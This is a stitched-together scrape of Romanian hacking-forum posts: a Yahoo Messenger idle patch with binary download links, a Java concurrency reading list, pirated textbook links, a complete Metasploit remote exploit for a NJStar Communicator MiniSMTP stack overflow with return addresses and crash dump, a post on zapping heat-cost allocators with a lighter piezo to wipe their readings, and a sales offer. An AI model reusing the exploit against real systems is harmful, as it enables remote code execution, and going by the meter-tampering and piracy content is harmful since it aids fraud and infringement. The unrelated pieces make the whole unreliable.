Leaderboard

Mai tineti minte, cand inca era Y!Messenger 8, s-a scos un idle patch, care practic schimba idle.dll din proiect. Astfel, aveati posibilitatea de a avea Idle la status chiar si in timp ce foloseati calculatorul. Apoi din Y!Messenger 9 daca nu ma gresesc a fost scos idle.dll, si functia a fost implementata direct in executabil. De atunci pana acu am mai cautat, dar nu am gasit nici un idle patch care lucra, surprinzator (ma corectati daca gresesc, eu personal nu am gasit). Cu putina munca in ollydbg, am gasit adresele necesare, si ce trebuie de schimbat. Am facut un patch in C care face el singur toate schimbarile. Il plasati in mapa unde e si YahooMessenger.exe, porniti si dati click pe Patch. Atat. Ca sa apara idle la status, verificati daca Show me as "Idle" e bifat, datii un minut, si asteptati pana apare Idle la status. Dupa aia n-o sa mai dispara. Ca sa-l scoateti, dati logout si login. L-am testat doar pe XP, nu stiu daca pe vista/7 cere drepturi de administrator, imi ziceti voi. Si e testat doar pe versiunea 11, nu garantez ca lucreaza pe altele. Nu ma supar daca il raspanditi si pe alte forumuri. UPDATE: Hai ca a devenit si 11.5 mai popular acum, am adaugat patchul si pentru el. Am adaugat si optiunea de ClearIdle Download: Y!M 11/11.5 IdlePatch: http://depositfiles.com/files/8sm367yy0 Executabilul cu patch aplicat: Y!M 11: http://depositfiles.com/files/fb2lmhp13 Y!M 11.5: http://depositfiles.com/files/iupwq52nn Pe cei care ii intereseaza, tutorial cum sa realizati hackul de la 0 (pentru 11.5 principiul este exact acelasi) Y!Messenger 11 IdleHack cu OllyDbg

edited.

Java concurrency Building and testing concurrent applications for the Java platform Date: 07 Oct 2011 (Published 23 Aug 2011) 1. Learn Java concurrency basics Threads and processes are the basic units of execution in concurrent Java programming. Every process has at least one thread, and all of the threads in a process share its resources. Understand the benefits of threads and why it's essential to use them safely. READ: Introduction to Java threads 2. Master high-level Java concurrency utilities Learn how to use the thread-safe, well-tested, high-performance concurrent building blocks in the java.util.concurrent package, introduced in Java SE 5. And find out how to avoid both common and lesser-known concurrency pitfalls. PRACTICE: Concurrency in JDK 5.0 READ: 5 things you didn't know about.. java.util.concurrent, Part 1 READ: 5 things you didn't know about ... java.util.concurrent, Part 2 READ: Java concurrency bug patterns for multicore systems 3. Test and analyze your concurrent code Take advantage of tools developed by IBM researchers for testing, debugging, and analyzing concurrent Java applications. DOWNLOAD: Java Thread Activity Analyzer(Free download) DOWNLOAD: IBM Lock Analyzer for Java(Free download) DOWNLOAD: IBM Thread and Monitor Dump Analyzer for Java(Free download) DOWNLOAD: Multicore Software Development Kit(Free download) DOWNLOAD: ConcurrentTesting - Advanced Testing for Multi-Threaded Applications(Free limited trial version) PRACTICE: Multithreaded unit testing with ConTest 4. Explore alternate concurrency models In response to advances in multicore processor hardware, approaches to writing concurrent applications for the Java platform are diversifying. Concurrency support in two alternate languages for the JVM — Scala and Clojure — eschew the thread model. Learn about the actor and agent concurrency in those languages, and about third-party Java and Groovy libraries that implement those models. And learn more about fork-join, a multicore-friendly concurrency enhancement in Java SE 7. LISTEN: Alex Miller talks concurrency READ: Explore Scala concurrency READ: Clojure and concurrency READ: Introducing Kilim: An actor framework for Java concurrency READ: Resolve common concurrency problems with GPars READ: Java theory and practice: Stick a fork in it Sursa: www.ibm.com/developerworks/training/kp/j-kp-concurrency/index.html

HTML: Comprehensive Concepts and Techniques, 5 edition HTML: Comprehensive Concepts and Techniques, 5 edition by Gary B. Shelly HTML: Comprehensive Concepts and Techniques, 5 edition by Gary B. Shelly, Denise M. Woods, William J. Dorin 2008 | ISBN: 1423927222 | 608 pages | PDF | 55 MB Download: http://www.filefactory.com/file/c223212/n/102711.BO.1423927222_(1).rar Mirror: http://www.filesonic.com/file/2854766385/102711.BO.1423927222_(1).rar

## # Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit # Date: 10/31/2011 # Author: Dillon Beresford # Twitter: https://twitter.com/#!/D1N # Software Link: http://www.njstar.com/download/njcom.exe # Version: 3.00 and prior # Build: 11818 and prior # Tested on: Windows XP SP3/SP2/SP1 and Windows Server 2003 SP0 # CVE : NONE # Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran, # manils, d0tslash, mublix, halsten, and everyone at AHA! ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ # ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'NJStar Communicator 3.00 MiniSMTP Server Remote Exploit', 'Description' => %q{ This module exploits a stack overflow vulnerability in NJStar Communicator Version 3.00 MiniSMTP server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Dillon Beresford', # Original discovery and MSF Module. 'Corelan Team', # tx for mona.py, all the tuts, and for being awesome. ], 'Version' => '$Revision:$', 'References' => [ [ 'OSVDB', '' ], [ 'CVE', '' ], [ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ], [ 'URL', 'http://www.youtube.com/watch?v=KvkKX035484'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -1500, }, 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x7c874413, 'Offset' => 247, } # jmp esp kernel32.dll ], [ 'Windows XP SP2', { 'Ret' => 0x77558952, 'Offset' => 247, } # jmp esp ntdll.dll ], [ 'Windows XP SP1', { 'Ret' => 0x77d718fc, 'Offset' => 247, } # jmp esp user32.dll ], [ 'Windows Server 2003 SP0', { 'Ret' => 0x71c033a0, 'Offset' => 247, } # jmp esp ntdll.dll ], ], # Feel free to add more targets. 'Privileged' => false, 'DisclosureDate' => 'OCT 31 2011', 'DefaultTarget' => 0)) register_options([Opt::RPORT(25)], self.class) end def exploit eggoptions = { :checksum => true, :eggtag => "w00t" } badchars = '\x00' hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions) if target.name =~ /Windows XP SP3/ buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) elsif target.name =~ /Windows XP SP2/ buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) elsif target.name =~ /Windows XP SP1/ buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) elsif target.name =~ /Windows Server 2003 SP0/ buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) end # Just some debugging output so we can see lengths and byte size of each of our buffer. print_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg)) print_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter)) print_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer)) print_status("Trying target #{target.name}...") # har har har you get trick no treat... # we dont have very much space so we # send our egg in a seperate connection connect print_status("Sending the egg...") sock.put(egg) # I think you betta call, ghostbusters... # now we send our evil buffer along with the # egg hunter, we are doing multiple connections # to solve the issue with limited stack space. # thanks to bannedit for advice on threads and # making multiple connections to get around # stack space constraints. connect print_status("Sending our buffer containing the egg hunter...") sock.put(buffer) handler disconnect end end ## # No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded # on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability # is remotely exploitable and needed more verification. I sent a proof of concept exploit # in python with remote code execution. So, here is the proof that the bug is, in fact, # remotely exploitable. WIN! ## ## # eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50 # edi=008a3d80 # eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 # efl=00010206 # 42424242 ?? ??? # 0:003> !exchain # image00400000+bbc4 (0040bbc4) # 00ccff00: 41414141 # Invalid exception stack at 41414141 # 0:003> d esp # 00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD # 00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD # 00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD # 00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A. # 00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=.. # 00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=...... # 00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................ # 00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........ ## SURSA

Am dat link mai sus, studiaza parametri diodei in camp electrostatic/electromagnetic si o sa vezi. Ia o dioda (nu LED !) si fa teste pe ea cu microvoltul, in ambele conditii (es/em) si in voltaje, amperaj diferit o sa fii uimit cum curentii de inductie blocheaza dioda. ------------------- O alta ,metoda dar care NU O RECOMAND LA NIMENI doar pentru test pe aparate separate, este "metoda brichetei" de la pacanele cu piezo de la bricheta dat pe LCD, sau pe alte parti in afara de placile metalice care sunt "GROUND" adica legate la pamant prin calorifer, scanteia trece si prin plastic de la piezo. Ce risti? STERGEREA SERIEI REPARTITORULUI CARE VA FI SCHIMBATA SI NECONCLUDENTA CU, CONTRACTUL. eu am deja la vanzare aparatul inca din 2010 il dau numai la cunostinte, de aceea va las pe voi sa veniti cu idei noi si o sa va ajut la constructia unui nou model gandit de voi, 20 lei cost de productie nu e mare lucru, mai mult nu are cum sa fie! fata de cat platesti din noiembrie pana in aprilie.Aparatul are cateva piese o bobina, un tranzistor..si elementele secundare ...si o baterie de 9V.. eu am deja la vanzare aparatul inca din 2010 il dau numai la cunostinte, de aceea va las pe voi sa veniti cu idei noi si o sa va ajut la constructia unui nou model gandit de voi, 20 lei cost de productie nu e mare lucru, mai mult nu are cum sa fie! fata de cat platesti din noiembrie pana in aprilie.Aparatul are cateva piese o bobina, un tranzistor..si elementele secundare ...si o baterie de 9V.. EDITED: Heat Cannon 1400W Over Temperature Device - no change http://youtu.be/dTn6vghVutM Original 3gp file: http://www.megaupload.com/?d=GDXTO4XC Other images: http://imageshack.us/g/827/p0111110001.jpg/

A mai trecut un an , dar sa fiu sincer a trecut foarte mult timp de cand multi au reusit sa iasa din localhost in WAN.Forumurile detin o cantitate foarte mare de byte deoarece informatia a fost scrisa de unii si rescrisa de altii , majoritatea sistemelor au inceput sa iasa cu o interfata grafica destul de avansata , sa trecut de la IPV4 la IPV6 si totusi gasim gunoaie pe forum. Ma intreb uneori care sunt obiectivele unora pe viitor si la ce se asteapta de la underground.Fiecare flux aduce persoane pe acest forum care pun aceleasi intrebari stupide in speranta de a face un leu din net fie in mod legal sau ilegal.Fiecare incearca sa ia ce poate fara a da in schimb nimic , fiecare distruge munca altuia fara a cunoaste doar pentru a avea popularitate. Ma uit in jur si vad persoane care incearca sa isi lase amprenta oriunde pentru popularitate , un deface , un XSS , un SQLI toate aceste lucruri sunt doar bucati de cod copiate de pe internet si puse in locul potrivit la momentul potrivit pentru a da nickname-ului o anumita reputatie si pentru a capata respect din partea celorlalti .Oare acest lucru inseamna ELITA? Ei bine mi-ar fi frica sa las calculatorul meu pe mana acestor persoane deoarece sar putea sa nu mai functioneze si in cel mai rau caz sa imi pierd toate datele personale. Si totusi informatia exista , sta chiar sub nas , iti da puterea de a controla de a construi si de a distruge.Majoritatea o cauta dar nu o gasesc , fiind ocupati cu lucruri materiale .Nu exista moneta pentru a cumpara lucrurile nemateriale , ele sunt gratuite si totusi putini le detin, informatia fiind unul din ele. Avand informatia necesara se poate obtine mai mult decat un access neautorizat intrun serviciu ssh, se poate face mai mult decat un deface, se poate controla mai mult decat un webserver public. Note: Informatiile gazduite pe un webserver public vin catalogate ca informatii publice fie el un webserver guvernativ sau oricare altul. Cunoscand cum functioneaza lucrurile se pot modifica Informatia este gratuita si totusi putini o detin.

Effy dau eu la bucata..doar paypal PM